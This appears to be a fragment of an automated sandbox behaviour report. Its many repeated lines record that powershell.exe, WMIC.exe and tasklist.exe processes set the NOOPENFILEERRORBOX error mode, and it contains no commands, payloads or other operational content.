Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
